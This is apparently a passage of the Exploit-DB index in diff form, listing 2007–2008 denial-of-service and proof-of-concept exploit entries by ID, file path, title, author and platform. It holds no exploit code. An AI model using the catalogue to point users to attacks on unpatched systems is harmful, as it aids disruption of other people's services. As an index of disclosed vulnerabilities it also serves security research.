-4757,exploits/windows/dos/4757.txt,"HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos, -4773,exploits/multiple/dos/4773.pl,"OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash",2007-12-23,"Noam Rathaus",multiple,dos, -4801,exploits/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos, -4829,exploits/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)",2008-01-02,anonymous,windows,dos, -4856,exploits/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",multiple,dos, -4878,exploits/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos, -4881,exploits/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos, -4885,exploits/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos, -4893,exploits/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos, -4911,exploits/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)",2008-01-15,mu-b,windows,dos, -4931,exploits/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow / Denial of Service",2008-01-17,shinnai,windows,dos, -4935,exploits/bsd/dos/4935.c,"OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos, -4978,exploits/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos, -4997,exploits/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos, -5036,exploits/windows/dos/5036.pl,"Titan FTP Server 6.03 - 'USER/PASS' Remote Heap Overflow (PoC)",2008-02-02,securfrog,windows,dos, -5043,exploits/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (PoC)",2008-02-02,h07,windows,dos, -5044,exploits/windows/dos/5044.pl,"Ipswitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow (PoC)",2008-02-03,securfrog,windows,dos, -5054,exploits/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos, -5063,exploits/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - '.m3u' File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos, -5067,exploits/windows/dos/5067.pl,"dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos, -5085,exploits/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",windows,dos, -5086,exploits/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos, -5110,exploits/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos, -5122,exploits/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos, -5142,exploits/windows/dos/5142.c,"DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos, -5151,exploits/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos, -5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,multiple,dos, -5184,exploits/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos, -5191,exploits/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos, -5201,exploits/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos, -5210,exploits/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service",2008-03-01,0in,linux,dos, -5217,exploits/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos, -5225,exploits/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos, -5229,exploits/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos, -5235,exploits/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service",2008-03-11,ryujin,windows,dos, -5258,exploits/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos, -5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos, -5268,exploits/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos, -5270,exploits/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos, -5306,exploits/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",multiple,dos, -5307,exploits/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos, -5316,exploits/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos, -5321,exploits/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos, -5327,exploits/windows/dos/5327.txt,"Microsoft Windows Explorer - '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos, -5341,exploits/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos, -5343,exploits/windows/dos/5343.py,"Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service",2008-04-02,muts,windows,dos, -5344,exploits/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos, -5349,exploits/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos, -5354,exploits/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos, -5396,exploits/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos, -5427,exploits/windows/dos/5427.pl,"Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos, -5438,exploits/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos, -5453,exploits/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos, -5455,exploits/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos, -5458,exploits/linux/dos/5458.txt,"Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos, -5460,exploits/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos, -5472,exploits/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos, -5515,exploits/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos, -5547,exploits/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos, -5561,exploits/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos, -5585,exploits/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos, -5679,exploits/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust",2008-05-27,Gogulas,multiple,dos, -5682,exploits/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos, -5687,exploits/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos, -5709,exploits/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos, -5712,exploits/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos, -5718,exploits/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos, -5727,exploits/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)",2008-06-02,securfrog,windows,dos, -5749,exploits/multiple/dos/5749.pl,"Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos, -5814,exploits/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos, -5817,exploits/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos, -5843,exploits/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos, -5851,exploits/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos, -5918,exploits/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,windows,dos, -5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos, -6029,exploits/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",multiple,dos, -6043,exploits/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",osx,dos, -6046,exploits/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service (PoC)",2008-07-12,"Mu Security",multiple,dos, -6059,exploits/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service",2008-07-13,Exodus,windows,dos, -6072,exploits/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",windows,dos, -6077,exploits/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server - Denial of Service",2008-07-15,Shinnok,windows,dos, -6083,exploits/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,windows,dos, -6090,exploits/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos, -6101,exploits/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service",2008-07-19,"Joxean Koret",multiple,dos, -6103,exploits/windows/dos/6103.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos, -6120,exploits/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,minix,dos, -6129,exploits/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,minix,dos, -6174,exploits/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos, -6181,exploits/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos, -6196,exploits/hardware/dos/6196.pl,"Xerox Phaser 8400 - Remote Reboot (Denial of Service)",2008-08-03,crit3rion,hardware,dos, -6201,exploits/windows/dos/6201.html,"HydraIrc 0.3.164 - Remote Denial of Service",2008-08-04,securfrog,windows,dos, -6216,exploits/windows/dos/6216.html,"Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos, -6218,exploits/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos, -6237,exploits/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos, -6239,exploits/multiple/dos/6239.txt,"Ruby 1.9 - regex engine Remote Socket Memory Leak",2008-08-13,"laurent gaffié",multiple,dos, -6240,exploits/windows/dos/6240.py,"FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)",2008-08-13,h07,windows,dos, -6244,exploits/windows/dos/6244.js,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow (PoC)",2008-08-14,Symantec,windows,dos, -6251,exploits/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation (PoC)",2008-08-16,g_,windows,dos, -6252,exploits/multiple/dos/6252.txt,"VideoLAN VLC Media Player 0.8.6i - '.tta' File Parsing Heap Overflow (PoC)",2008-08-16,g_,multiple,dos, -6253,exploits/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)",2008-08-16,j0rgan,windows,dos, -6257,exploits/windows/dos/6257.pl,"Ipswitch WS_FTP Home/Professional FTP Client - Remote Format String (PoC)",2008-08-17,securfrog,windows,dos, -6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,windows,dos, -6293,exploits/multiple/dos/6293.txt,"VideoLAN VLC Media Player 0.8.6i - Mms Protocol Handling Heap Overflow (PoC)",2008-08-23,g_,multiple,dos, -6319,exploits/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption",2008-08-27,shinnai,windows,dos, -6326,exploits/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)",2008-08-29,"YAG KOHHA",windows,dos, -6327,exploits/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow (PoC)",2008-08-29,shinnai,windows,dos, -6330,exploits/windows/dos/6330.txt,"Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos, -6345,exploits/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,windows,dos, -6353,exploits/windows/dos/6353.txt,"Google Chrome 0.2.149.27 - Denial of Service",2008-09-03,"Rishi Narang",windows,dos, -6365,exploits/windows/dos/6365.php,"Google Chrome 0.2.149.27 - '1583' Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos, -6372,exploits/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,windows,dos, -6386,exploits/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,windows,dos, -6391,exploits/windows/dos/6391.html,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,windows,dos, -6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",hardware,dos, -6424,exploits/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",windows,dos, -6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,windows,dos, -6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,windows,dos, -6459,exploits/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos, -6463,exploits/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",windows,dos, -6471,exploits/multiple/dos/6471.pl,"Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos, -6472,exploits/multiple/dos/6472.c,"Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos, -6474,exploits/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos, -6481,exploits/php/dos/6481.c,"Femitter FTP Server 1.03 - 'RETR' Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,php,dos, -6493,exploits/linux/dos/6493.pl,"fhttpd 0.4.2 - 'un64()' Remote Denial of Service",2008-09-19,"Jeremy Brown",linux,dos, -6496,exploits/windows/dos/6496.c,"DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,windows,dos, -6497,exploits/windows/dos/6497.c,"DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,windows,dos, -6498,exploits/windows/dos/6498.c,"DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,windows,dos, -6515,exploits/windows/dos/6515.c,"DESlock+ 3.2.7 - 'vdlptokn.sys' Local Denial of Service",2008-09-21,"NT Internals",windows,dos, -6554,exploits/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos, -6560,exploits/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos, -6565,exploits/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos, -6581,exploits/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos, -6582,exploits/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service)",2008-09-26,"Julien Bedard",hardware,dos, -6588,exploits/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ICO' Remote Division By Zero",2008-09-26,"laurent gaffié",windows,dos, -6609,exploits/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos, -6614,exploits/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos, -6615,exploits/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos, -6616,exploits/windows/dos/6616.txt,"Microsoft Windows Explorer - '.zip' Denial of Service",2008-09-28,"fl0 fl0w",windows,dos, -6619,exploits/windows/dos/6619.html,"Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)",2008-09-28,"John Smith",windows,dos, -6622,exploits/multiple/dos/6622.txt,"Wireshark 1.0.x - '.ncf' Packet Capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos, -6647,exploits/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos, -6651,exploits/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos, -6654,exploits/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos, -6658,exploits/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service",2008-10-03,LiquidWorm,windows,dos, -6660,exploits/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service",2008-10-03,dmnt,windows,dos, -6668,exploits/windows/dos/6668.txt,"AyeView 2.20 - '.GIF' Image Local Crash",2008-10-04,suN8Hclf,windows,dos, -6671,exploits/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos, -6672,exploits/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos, -6673,exploits/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos, -6689,exploits/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",linux,dos, -6704,exploits/linux/dos/6704.txt,"Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos, -6716,exploits/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos, -6717,exploits/windows/dos/6717.py,"WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service",2008-10-09,dmnt,windows,dos, -6718,exploits/linux/dos/6718.html,"Konqueror 3.5.9 - 'load' Remote Crash",2008-10-10,"Jeremy Brown",linux,dos, -6719,exploits/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos, -6726,exploits/hardware/dos/6726.txt,"Nokia Mini Map Browser - 'Array Sort' Silent Crash",2008-10-10,ikki,hardware,dos, -6732,exploits/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,windows,dos, -6738,exploits/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,windows,dos, -6741,exploits/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos, -6742,exploits/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos, -6752,exploits/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos, -6753,exploits/windows/dos/6753.py,"Titan FTP Server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos, -6756,exploits/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos, -6761,exploits/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos, -6775,exploits/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos, -6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos, -6805,exploits/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos, -6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos, -6815,exploits/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",windows,dos, -6824,exploits/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos, -6832,exploits/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos, -6834,exploits/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos, -6838,exploits/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos, -6863,exploits/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos, -6926,exploits/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos, -7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos, -7088,exploits/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos, -7090,exploits/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos, -7091,exploits/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)",2008-11-11,"Andrea Bittau",linux,dos, -7099,exploits/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos, -7100,exploits/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos, -7109,exploits/windows/dos/7109.txt,"Pi3Web 2.0.3 - 'ISAPI' Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos, -7126,exploits/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos, -7150,exploits/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos, -7178,exploits/windows/dos/7178.txt,"BitDefender - Module pdf.xmd Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos, -7207,exploits/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos, -7209,exploits/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - URL Bar Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos, -7213,exploits/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser - 'id' Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos, -7219,exploits/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash",2008-11-24,Cnaph,windows,dos, -7220,exploits/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos, -7226,exploits/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos, -7249,exploits/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - 'wscanf' Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos, -7262,exploits/windows/dos/7262.pl,"Microsoft Office - Communicator 'SIP' Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos, -7296,exploits/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflows (PoC)",2008-11-30,"laurent gaffié",windows,dos, -7297,exploits/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos, -7307,exploits/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos, -7314,exploits/windows/dos/7314.txt,"Maxum Rumpus 6.0 - 